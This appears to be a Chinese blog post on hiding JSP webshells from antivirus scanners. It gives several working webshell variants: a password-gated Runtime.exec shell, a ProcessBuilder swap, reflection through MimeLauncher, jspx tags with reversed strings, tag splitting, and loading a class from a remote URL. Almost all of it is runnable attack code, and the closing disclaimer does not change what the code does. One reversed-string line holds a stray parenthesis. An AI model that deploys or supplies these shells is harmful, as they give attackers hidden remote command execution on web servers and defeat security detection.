内置函数免杀/MimeLauncher+反射

正常的jsp马,直接通过GET参数调用Runtime中的exec方法进行命令执行,这里如果正则匹配到Runtime.getRuntime().exec则很容易被查杀


<% 
if("023".equals(request.getParameter("pwd"))){
   java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 
   int a = -1; byte[] b = new byte[2048]; out.print("<pre>");
   while((a=in.read(b))!=-1){ out.println(new String(b)); 
     } 
     out.print("</pre>"); } %

 我们可以利用ProcessBuilder替换Runtime.getruntime().exec()因为他最终实际上也是调用的ProcessBuilder中的函数,直接使用ProcessBuilder则可以直接替换Runtime从而绕过正则表达式


<%
  String pentest = request.getParameter("pentest");
  Process process = new ProcessBuilder(new String[]{pentest}).start();
  InputStream is = process.getInputStream();
  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
  String r = null;
  while((r = bufferedReader.readLine())!=null){
    response.getWriter().println(r);
  }
%>

MinmeLaunche.run()内置getRuntime函数也可以进行执行,不过需要借助于反射进行调用


<%@ page import="java.io.*" %>
<%@ page import="java.net.URLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="sun.net.www.MimeEntry" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
    String cmd = request.getParameter("cmd");
    URLConnection urlConnection = new URL("http://127.0.0.1%s").openConnection();
    MimeEntry mimeEntry = new MimeEntry("naihe");
    Class meClass = MimeEntry.class;
    Field field = meClass.getDeclaredField("command");
    field.setAccessible(true);

    Field field2 = meClass.getDeclaredField("tempFileNameTemplate");
    field2.setAccessible(true);
    field2.set(mimeEntry,"naihe%s567");

    InputStream inputStream = new InputStream() {
        @Override
        public int read() throws IOException {
            return -1;
        }
    };

    Class mimeClass = Class.forName("sun.net.www.MimeLauncher");
    Constructor mimeCon = mimeClass.getDeclaredConstructor(MimeEntry.class,URLConnection.class,
            InputStream.class,String.class,String.class);
    mimeCon.setAccessible(true);
    Thread thread = (Thread) mimeCon.newInstance(mimeEntry, urlConnection, inputStream, "0","0");
    Field field3 = mimeClass.getDeclaredField("execPath");
    field3.setAccessible(true);
    field3.set(thread,cmd);
    Method m = mimeClass.getDeclaredMethod("run");
    m.setAccessible(true);
    m.invoke(thread);
%>

CDATA特性+反射+字符串反转

利用jspx的特性,因为jspx为xml格式的jsp文件,在jspx中,可以利用<jsp:script>进行替换<%%>


<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<jsp:script>
String x = request.getParameter("x");
if(x!=null){
 Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
 Method gr = rt.getMethod(reverseStr("emitnuRteg"));
    Method ex = rt.getMethod(reverseStr("cexe"), String.class);
 Process e = (Process) ex.invoke(gr.invoke(null),  x);
 java.io.InputStream in = e.getInputStream();
 int a = -1;
 byte[] b = new byte[2048];
 out.print("<pre>");
 while((a=in.read(b))!=-1){
  out.println(new String(b));
 }
 out.print("</pre>");
}
</jsp:script>

JSPwebshell之多标签拆分

tomcat处理标签的时候,最后会把同一个类型的多个标签的body放在一起填充可以使用trimDirectiveWhitespaces属性就会隐去\n,造成多标签拼接到一行数据


<%@ page contentType="text/html;charset=UTF-8" language="java"%>
<%@ page trimDirectiveWhitespaces='true'%>
<%Runtime%>
<%.getRuntime()%>
<%.exec(request.getParameter("test"));%>

JSP之远程加载class+字符反转

直接利用远程在家class文件,特征少,有种内置函数那味儿,不完全嘛,展示代码


<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.lang.reflect.Method" %>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
  String cmd = request.getParameter("id");
  URL url = new URL("http://127.0.0.1:8000/");
  URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
  System.out.println(classLoader.getParent());
  Class shell = classLoader.loadClass(reverseStr("stet.omed.moc)");
  Object object =  shell.newInstance();
  Method dm = shell.getMethod(reverseStr("snur"),String.class);
  Object invoke = dm.invoke(object, cmd);
  response.getWriter().println(invoke);

%>

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。